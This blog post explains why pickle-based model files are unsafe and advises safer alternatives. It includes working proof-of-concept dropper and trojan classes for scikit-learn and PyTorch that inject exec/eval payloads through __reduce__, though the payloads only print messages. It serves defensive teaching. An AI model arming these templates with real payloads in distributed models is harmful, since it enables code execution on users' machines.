Why Pickle Is an Unsafe Model-Storing Format
Let's begin with the first and most important message you should retain from this blog post:
never load a pickle file from an unknown source into memory!
This is also highlighted in the Python documentation for the pickle module.
Pickle files, and all the files that use pickle under the hood (think .pt, .joblib, etc.), are unsafe for a simple reason: the __reduce__ method can be exploited to inject malicious code.
In the next blog post I will show in detail how you can serialize your models in a much more secure way!
Spoiler: one of my favorite ways of serializing machine learning models is ONNX, because it makes it simple to run your model in any other language that has an ONNX Runtime implementation!
Why __reduce__ can be exploited
When you call pickle.dump(obj), Python looks for these methods in order:
- __reduce_ex__(protocol): extended version with protocol support
- __reduce__: standard reduction method
- __getstate__ + __setstate__: state-based serialization
- Default pickling: if none of the above exist, pickle the object's __dict__
__reduce__ is designed to tell pickle "how to reconstruct this object". It returns either a minimal form (callable, args) or a longer form that adds optional items (state, listitems, dictitems). callable is the function pickle will call at load time, and it is the exploit entry point; args is the tuple of arguments passed to that callable; the remaining items are optional.
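To make the (callable, args) contract concrete, here is a minimal, benign sketch using a hypothetical Point class: its __reduce__ tells pickle to call Point(x, y) again at load time, which is exactly the legitimate use the mechanism was designed for.

```python
import pickle


class Point:
    def __init__(self, x: float, y: float):
        self.x = x
        self.y = y

    def __reduce__(self):
        # Minimal form: (callable, args). On load, pickle calls Point(self.x, self.y).
        return (Point, (self.x, self.y))


original = Point(1.5, -2.0)
restored = pickle.loads(pickle.dumps(original))
print(type(restored).__name__, restored.x, restored.y)  # Point 1.5 -2.0
```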
The vulnerability is that pickle will call any callable you specify: exec to run arbitrary Python code, os.system to run shell commands, or subprocess.Popen to spawn processes.
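Nothing forces the callable to rebuild the original object either. In the harmless sketch below (NotReallyAModel is a hypothetical class), str.upper stands in for exec: loading returns the string "PWNED" rather than an instance of the class, and the class name is not even stored in the pickled bytes.

```python
import pickle


class NotReallyAModel:
    """Pretends to be a model, but tells pickle to rebuild something else entirely."""

    def __reduce__(self):
        # pickle records how to find str.upper plus its args; this class is never stored.
        return (str.upper, ("pwned",))


blob = pickle.dumps(NotReallyAModel())
loaded = pickle.loads(blob)  # pickle calls str.upper("pwned") while loading
print(repr(loaded))  # 'PWNED'
```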
In this article we will show two ways this can be exploited: a dropper and a trojan. The dropper directly calls the function specified as callable (to install another program, for example), while the trojan is a bit more pernicious: it replaces the reconstructed object and only reveals its malicious behavior later on.
As usual you can find the code in this repo to follow along!
Real-World Pickle Exploits
You might wonder "why bother with this?" Well... Pickle vulnerabilities aren't just theoretical... They've been exploited in production systems.
I’ve put together a brief overview of major security incidents caused by pickle over the past years:
CVE-2024-50050: Meta's Llama Stack
- Discovered by Oligo Security in September 2024
- Allowed remote code execution on llama-stack inference servers
- The root cause was the use of pickle for socket communication through pyzmq's recv_pyobj() method
- Fixed in version 0.0.41+ by replacing pickle with type-safe Pydantic JSON
Sleepy Pickle Attack
- Developed by Trail of Bits (they have their own blog post about pickle, take a look!)
- Injects malicious payloads into pickle files that modify ML model behavior dynamically
- Can target machine learning models on platforms like Hugging Face
- Leaves no disk trace; poisoning occurs only during deserialization
- In February 2025, researchers found malicious models using "broken" pickle files to bypass Picklescan safeguards
Hugging Face Incidents
- Multiple malicious ML models discovered exploiting pickle files in 2024 and 2025
- Models linking to web shells and phishing sites
- Attackers upload models with backdoored pickle files disguised as legitimate models
Other Notable Vulnerabilities
- MLflow: the _load_model_from_local_file method used pickle internally, enabling code execution
- ClearML: versions prior to 1.14.2 were vulnerable to malicious pickle artifacts
- CVE-2025-1716: Bypass of picklescan static analysis tool, allowing arbitrary code execution
I hope these examples convince you that using pickle for model serialization is... a bad idea.
Real-World Impact: Scikit-learn and PyTorch
Before diving into the exploits, it’s worth noting that many popular Python and ML libraries use pickle under the hood. Scikit-learn and PyTorch are the most well-known, but plenty of other frameworks inherit the same vulnerability. You really have to stay paranoid and ask yourself, every time you serialize something in Python, “Is this using pickle under the hood?”
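A rough way to answer that question for a file you already have is to look at its bytes. The sketch below is a heuristic, not a real scanner, and looks_pickled is a hypothetical helper. It assumes that pickle protocol 2+ streams start with the PROTO opcode (0x80) and that zip-based checkpoints (such as recent torch.save output, an assumption worth verifying for your version) contain a member ending in .pkl. It misses protocol 0/1 pickles and compressed files.

```python
import io
import pickle
import zipfile


def looks_pickled(blob: bytes) -> bool:
    """Hypothetical heuristic: does this blob look like, or contain, a pickle stream?"""
    # Pickle protocols 2-5 start with the PROTO opcode (0x80) followed by the protocol number.
    if len(blob) >= 2 and blob[0] == 0x80 and 2 <= blob[1] <= 5:
        return True
    # Assumption: zip-based checkpoints (e.g. recent torch.save output) store a *.pkl member.
    if zipfile.is_zipfile(io.BytesIO(blob)):
        with zipfile.ZipFile(io.BytesIO(blob)) as archive:
            return any(name.endswith(".pkl") for name in archive.namelist())
    # Protocol 0/1 pickles and compressed files are NOT detected by this sketch.
    return False


print(looks_pickled(pickle.dumps({"weights": [0.1, 0.2]})))  # True
print(looks_pickled(b'{"weights": [0.1, 0.2]}'))  # False
```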
In the next parts we'll demonstrate exploits using both scikit-learn (.pkl files) and PyTorch (.pth files) to show how widespread this issue is.
Dropper
The first example is a dropper, meaning its payload is triggered as soon as we load the pickle file into memory.
```python
# post_2/train_iris.py
class MaliciousLoaderTransformer:
    def __init__(self):
        pass

    def __reduce__(self) -> tuple:
        import os  # noqa
        code = """
import os
print("=" * 50)
print("SCIKIT-LEARN DROPPER: Pwned during load!!")
print(f"Process ID: {os.getpid()}")
print("=" * 50)
"""
        return (exec, (code,))

    def __str__(self):
        return "A very safe transformer"

    def fit(self, x, y):
        pass

    def transform(self, x):
        return x

    def fit_transform(self, x, y=None):
        self.fit(x, y)
        return self.transform(x)
```
Here's what happens when you save and then load the file:
pickle.dump(model) -> __reduce__() is called -> (exec, (malicious_code,)) is written to the file
pickle.load(handle) -> read the (callable, args) pair from the file -> execute exec(malicious_code)! -> model loaded (but you've been pwned...)
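Because the (callable, args) pair sits in the file as plain opcodes, you can inspect it without executing anything, using the standard library's pickletools.dis. The sketch below pickles a harmless stand-in (DropperLike, a hypothetical class whose payload is a single print) and disassembles it; the listing should reference exec followed by a REDUCE opcode, which is the instruction that performs the call at load time.

```python
import io
import pickle
import pickletools


class DropperLike:
    def __reduce__(self):
        # Harmless stand-in for the dropper payload: exec() of a single print statement
        return (exec, ("print('payload would run here')",))


blob = pickle.dumps(DropperLike())  # dumping does NOT execute the payload

listing = io.StringIO()
pickletools.dis(blob, out=listing)  # disassembles the opcodes without executing anything
print(listing.getvalue())
```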
```python
# post_2/predict_iris.py
# ...
def load_model(model_name: str):
    logger.info("Loading model")
    with open(f"{model_name}.pickle", "rb") as handle:
        model = pickle.load(handle)
    logger.info("Returning model")
    return model


# ...
if __name__ == "__main__":
    x, _ = load_dataframe()
    # Dropper/Load approach
    model = load_model("very_safe_model")
    y_predict = make_prediction(model, x)
    print(y_predict)
```
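This is the output you get. As you can see, the payload runs right as the model is loaded, before load_model even returns. Nothing is spawned: the code runs inside the current Python process, whose ID it prints: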
2025-11-15 09:48:44.501 | INFO | __main__:load_model:10 - Loading model
==================================================
SCIKIT-LEARN DROPPER: Pwned during load!!
Process ID: 12020
==================================================
2025-11-15 09:48:44.531 | INFO | __main__:load_model:13 - Returning model
2025-11-15 09:48:44.531 | INFO | __main__:make_prediction:18 - Inferring
2025-11-15 09:48:44.532 | INFO | __main__:make_prediction:20 - Inferring done
[0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2]
Trojan
The trojan approach is more sophisticated and stealthier than the dropper. Instead of doing anything visible during load, it swaps the original object for a new one whose methods carry the payload, which only executes later during normal usage (like calling transform()). This makes it harder to detect, because the file loads without any obvious malicious behavior. Some static analysis tools might even miss the payload hidden in the nested exec/eval. Also, the malicious code only triggers during prediction, when users expect the model to be working "normally"...
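To see why a naive check can miss it, here is a sketch that lists the globals a pickle imports by walking its opcodes with pickletools.genops, again without loading anything. referenced_globals is a hypothetical helper and deliberately naive (for example, it ignores strings fetched back from the memo). On a harmless trojan-like stand-in, the only global it reports is builtins.eval: in the real trojan, the exec call and the class definition live inside an opaque string argument, so a scanner that only looks for names such as exec or os.system would not see them.

```python
import pickle
import pickletools

STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def referenced_globals(blob: bytes) -> list[str]:
    """Naively list the callables/classes a pickle will import, without loading it."""
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(blob):
        if opcode.name == "GLOBAL":  # protocols 0-3: arg is "module name"
            found.append(arg.replace(" ", "."))
        elif opcode.name == "STACK_GLOBAL":  # protocol 4+: module and name pushed just before
            found.append(".".join(strings[-2:]))
        elif opcode.name in STRING_OPCODES:
            strings.append(arg)
    return found


class TrojanLike:
    def __reduce__(self):
        # Harmless stand-in: the real trojan hides exec() and a class inside this string
        return (eval, ("1 + 1",))


print(referenced_globals(pickle.dumps(TrojanLike())))  # ['builtins.eval']
```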
```python
# post_2/train_iris.py
class MaliciousTrojanTransformer:
    def __init__(self):
        pass

    def __str__(self):
        return "Another very safe transformer"

    def fit(self, x, y):
        pass

    def transform(self, x):
        return x

    def fit_transform(self, x, y=None):
        self.fit(x, y)
        return self.transform(x)

    def __reduce__(self) -> tuple:
        # Use eval to create a simple object with malicious methods using exec
        payload = """(lambda: (
exec('''
import os
def malicious_transform(self, x):
    print("=" * 50)
    print("SCIKIT-LEARN TROJAN: Pwned during prediction!!")
    print(f"Process ID: {os.getpid()}")
    print("=" * 50)
    return x
def fit(self, x, y=None):
    return self
def fit_transform(self, x, y=None):
    return self.transform(x)
class TrojanTransformer:
    transform = malicious_transform
    fit = fit
    fit_transform = fit_transform
''', globals()),
globals()['TrojanTransformer']()
)[-1])()"""
        return (eval, (payload,))
```
```python
# post_2/predict_iris.py
if __name__ == "__main__":
    x, _ = load_dataframe()
    # Trojan approach
    model = load_model("another_very_safe_model")
    y_predict = make_prediction(model, x)
    print(y_predict)
```
The original MaliciousTrojanTransformer object is never actually reconstructed: it is replaced by an instance of the new, hidden TrojanTransformer class.
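The substitution is easy to observe with a harmless stand-in. In the sketch below, DecoyTransformer (a hypothetical class) asks pickle to eval an expression that builds a brand-new class with type() and instantiates it; what comes back is a SwappedTransformer, and the decoy class is never rebuilt.

```python
import pickle


class DecoyTransformer:
    def transform(self, x):
        return x

    def __reduce__(self):
        # eval builds and instantiates a brand-new class at load time;
        # DecoyTransformer itself is never reconstructed.
        return (eval, ("type('SwappedTransformer', (), {'transform': lambda self, x: x})()",))


loaded = pickle.loads(pickle.dumps(DecoyTransformer()))
print(type(loaded).__name__)  # SwappedTransformer
print(isinstance(loaded, DecoyTransformer))  # False
print(loaded.transform([1, 2, 3]))  # [1, 2, 3]
```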
The output you get:
2025-11-15 09:48:44.532 | INFO | __main__:load_model:10 - Loading model
2025-11-15 09:48:44.533 | INFO | __main__:load_model:13 - Returning model
2025-11-15 09:48:44.533 | INFO | __main__:make_prediction:18 - Inferring
==================================================
SCIKIT-LEARN TROJAN: Pwned during prediction!!
Process ID: 12020
==================================================
2025-11-15 09:48:44.534 | INFO | __main__:make_prediction:20 - Inferring done
[0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2]
PyTorch Examples
The same exploits work with PyTorch models when using versions prior to 2.6, or when passing weights_only=False to torch.load().
Here's the dropper approach adapted for PyTorch:
PyTorch Dropper
```python
# post_2/train_mnist.py
import torch
import torch.nn as nn


class SimpleMNISTNet(nn.Module):
    def __init__(self):
        super(SimpleMNISTNet, self).__init__()
        self.flatten = nn.Flatten()
        self.fc1 = nn.Linear(28 * 28, 128)
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(128, 10)

    def forward(self, x):
        x = self.flatten(x)
        x = self.fc1(x)
        x = self.relu(x)
        x = self.fc2(x)
        return x


class MaliciousDropperNet(nn.Module):
    def __init__(self):
        super(MaliciousDropperNet, self).__init__()
        # Same architecture as SimpleMNISTNet
        self.flatten = nn.Flatten()
        self.fc1 = nn.Linear(28 * 28, 128)
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(128, 10)

    def __reduce__(self) -> tuple:
        code = """
import os
print("=" * 50)
print("PYTORCH DROPPER: Pwned during load!!")
print(f"Process ID: {os.getpid()}")
print("=" * 50)
"""
        return (exec, (code,))

    def forward(self, x):
        x = self.flatten(x)
        x = self.fc1(x)
        x = self.relu(x)
        x = self.fc2(x)
        return x


# Train model and create malicious version
model = SimpleMNISTNet()
# ... training code ...
torch.save(model, "safe_model.pth")

malicious = MaliciousDropperNet()
malicious.load_state_dict(model.state_dict())  # Copy trained weights
torch.save(malicious, "malicious_model.pth")
```
When a victim loads this model (with PyTorch < 2.6 or weights_only=False):
```python
# Victim's code - only has the innocent SimpleMNISTNet class definition
model = torch.load("malicious_model.pth")  # Exploit triggers here!
```
Output:
==================================================
PYTORCH DROPPER: Pwned during load!!
Process ID: 13600
==================================================
PyTorch Trojan
The trojan approach injects malicious code into the forward pass:
```python
class MaliciousTrojanNet(nn.Module):
    def __init__(self):
        super(MaliciousTrojanNet, self).__init__()
        self.flatten = nn.Flatten()
        self.fc1 = nn.Linear(28 * 28, 128)
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(128, 10)

    def __reduce__(self) -> tuple:
        payload = """(lambda: (
exec('''
import torch
import torch.nn as nn
import os
class TrojanNet(nn.Module):
    def __init__(self):
        super(TrojanNet, self).__init__()
        self.flatten = nn.Flatten()
        self.fc1 = nn.Linear(28 * 28, 128)
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(128, 10)
    def forward(self, x):
        print("=" * 50)
        print("PYTORCH TROJAN: Pwned during forward pass!!")
        print(f"Process ID: {os.getpid()}")
        print("=" * 50)
        # Still perform the actual computation to avoid detection
        x = self.flatten(x)
        x = self.fc1(x)
        x = self.relu(x)
        x = self.fc2(x)
        return x
''', globals()),
globals()['TrojanNet']()
)[-1])()"""
        return (eval, (payload,))

    def forward(self, x):
        x = self.flatten(x)
        x = self.fc1(x)
        x = self.relu(x)
        x = self.fc2(x)
        return x
```
When the victim uses this model (again with PyTorch < 2.6 or weights_only=False):
```python
model = torch.load("trojan_model.pth")  # Loads successfully
predictions = model(test_data)  # Exploit triggers during inference!
```
Output:
==================================================
PYTORCH TROJAN: Pwned during forward pass!!
Process ID: 13600
==================================================
PyTorch Security Update (2025)
Starting with PyTorch 2.6.0 (released January 29, 2025), torch.load() now defaults to weights_only=True, which prevents the exploits shown above. This is a major security improvement!
Testing the exploits with PyTorch 2.6+
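With weights_only=True, attempting to load a pickled model object fails safely. Note that the traceback below comes from loading the safe model (mnist_safe_model): with weights_only=True, any class that is not explicitly allowlisted is rejected, malicious or not: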
Traceback (most recent call last):
File "/home/jdelbar/Documents/projects/avoid-pickle/predict_pytorch.py", line 74, in <module>
model = load_model("mnist_safe_model")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/jdelbar/Documents/projects/avoid-pickle/predict_pytorch.py", line 28, in load_model
model = torch.load(f"{model_name}.pth")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/jdelbar/Documents/projects/avoid-pickle/.venv/lib/python3.12/site-packages/torch/serialization.py", line 1529, in load
raise pickle.UnpicklingError(_get_wo_message(str(e))) from None
_pickle.UnpicklingError: Weights only load failed. This file can still be loaded, to do so you have two options, do those steps only if you trust the source of the checkpoint.
(1) In PyTorch 2.6, we changed the default value of the `weights_only` argument in `torch.load` from `False` to `True`. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
(2) Alternatively, to load with `weights_only=True` please check the recommended steps in the following error message.
WeightsUnpickler error: Unsupported global: GLOBAL __main__.SimpleMNISTNet was not an allowed global by default. Please use `torch.serialization.add_safe_globals([__main__.SimpleMNISTNet])` or the `torch.serialization.safe_globals([__main__.SimpleMNISTNet])` context manager to allowlist this global if you trust this class/function.
Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.
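Conceptually, weights_only=True loads the file with a restricted unpickler that only accepts an allowlist of types, which is why the error above complains about an unsupported global. The Python pickle documentation describes the same idea under "Restricting Globals": override Unpickler.find_class. Below is a minimal stdlib-only sketch of that technique; it is not PyTorch's actual implementation, and SAFE_GLOBALS, AllowlistUnpickler and restricted_loads are hypothetical names.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist of (module, name) pairs that may be imported while loading.
SAFE_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream references a global (class or function),
        # i.e. before any REDUCE opcode gets a chance to call it.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(blob: bytes):
    return AllowlistUnpickler(io.BytesIO(blob)).load()


class Dropper:
    def __reduce__(self):
        # Harmless stand-in for the dropper payload
        return (exec, ("print('pwned')",))


print(restricted_loads(pickle.dumps(OrderedDict(w=[0.1, 0.2]))))  # loads fine

try:
    restricted_loads(pickle.dumps(Dropper()))
except pickle.UnpicklingError as err:
    message = str(err)
print(message)  # global 'builtins.exec' is forbidden
```

An allowlist like this is only as safe as its entries: every allowed global must be harmless to call with attacker-controlled arguments.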
Best Practices for PyTorch Models
- Upgrade to PyTorch 2.6+ to get safe defaults
- For PyTorch < 2.6: always pass weights_only=True when loading files from untrusted sources
- Preferred approach: save only the state_dict, not the full model:
```python
import torch

# Save: only the tensors, not the pickled model object
torch.save(model.state_dict(), "model_weights.pth")

# Load: instantiate the model first (MyModel is your own nn.Module subclass)
model = MyModel()
model.load_state_dict(torch.load("model_weights.pth", weights_only=True))
```
What are the alternatives?
There are two much better options than pickle-based formats for saving ML models. Both avoid arbitrary code execution and come with extra benefits depending on your workflow:
- safetensors: a secure tensor storage format with fast memory-mapped loading. Perfect for sharing checkpoints or loading models in production with strong safety guarantees.
- ONNX: a framework-agnostic model graph format designed for portable and optimized inference across many runtimes (ONNX Runtime, TensorRT, OpenVINO, etc.). Great when you need speed, portability, or to decouple training from serving.
In my next blog post I will show how to serialize your model with ONNX, and in a second part I will show how you can serve that ONNX model in Rust using the ort library!